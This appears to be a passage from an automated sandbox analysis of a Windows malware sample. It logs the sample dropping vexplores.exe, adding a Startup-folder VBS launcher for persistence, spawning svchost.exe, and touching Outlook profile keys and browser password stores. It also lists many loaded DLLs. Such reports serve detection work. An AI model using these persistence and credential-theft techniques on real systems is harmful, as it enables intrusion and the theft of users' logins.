              Source: C:\Users\user\Desktop\kG713MWffq.exeFile created: C:\Users\user\AppData\Local\Temp\deblaterationJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vexplores.vbs"
              Source: C:\Users\user\Desktop\kG713MWffq.exeCommand line argument: Wu0_2_0040D6B0
              Source: kG713MWffq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\kG713MWffq.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: svchost.exe, 00000004.00000002.3867759274.0000000005657000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.0000000005675000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.000000000569A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1782250333.000000000650D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.0000000005667000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005BA6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005B73000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005BB2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005B81000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2011516743.0000000006A1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: kG713MWffq.exeReversingLabs: Detection: 68%
              Source: C:\Users\user\Desktop\kG713MWffq.exeFile read: C:\Users\user\Desktop\kG713MWffq.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\kG713MWffq.exe "C:\Users\user\Desktop\kG713MWffq.exe"
              Source: C:\Users\user\Desktop\kG713MWffq.exeProcess created: C:\Users\user\AppData\Local\Videos\vexplores.exe "C:\Users\user\Desktop\kG713MWffq.exe"
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\kG713MWffq.exe"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vexplores.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Videos\vexplores.exe "C:\Users\user\AppData\Local\Videos\vexplores.exe"
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Videos\vexplores.exe"
              Source: C:\Users\user\Desktop\kG713MWffq.exeProcess created: C:\Users\user\AppData\Local\Videos\vexplores.exe "C:\Users\user\Desktop\kG713MWffq.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\kG713MWffq.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Videos\vexplores.exe "C:\Users\user\AppData\Local\Videos\vexplores.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Videos\vexplores.exe" Jump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: msdart.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: msdart.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: msdart.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: kG713MWffq.exeStatic file information: File size 1116491 > 1048576
              Source: Binary string: _.pdb source: svchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
              Source: vexplores.exe.0.drStatic PE information: real checksum: 0xa961f should be: 0x11ce94
              Source: kG713MWffq.exeStatic PE information: real checksum: 0xa961f should be: 0x11ce94
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041C40C push cs; iretd 4_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00423149 push eax; ret 4_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041C50E push cs; iretd 4_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004231C8 push eax; ret 4_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E21D push ecx; ret 4_2_0040E230
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041C6BE push ebx; ret 4_2_0041C6BF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0791E558 push eax; iretd 4_2_0791E559
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_092A7618 push ss; iretd 4_2_092A7620
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041C40C push cs; iretd 7_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00423149 push eax; ret 7_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041C50E push cs; iretd 7_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004231C8 push eax; ret 7_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E21D push ecx; ret 7_2_0040E230
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041C6BE push ebx; ret 7_2_0041C6BF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053CE558 push eax; iretd 7_2_053CE559
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_053CF737 push cs; retf 7_2_053CF73B
              Source: C:\Users\user\Desktop\kG713MWffq.exeFile created: C:\Users\user\AppData\Local\Videos\vexplores.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vexplores.vbsJump to dropped file
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vexplores.vbsJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vexplores.vbsJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
              Source: C:\Users\user\Desktop\kG713MWffq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
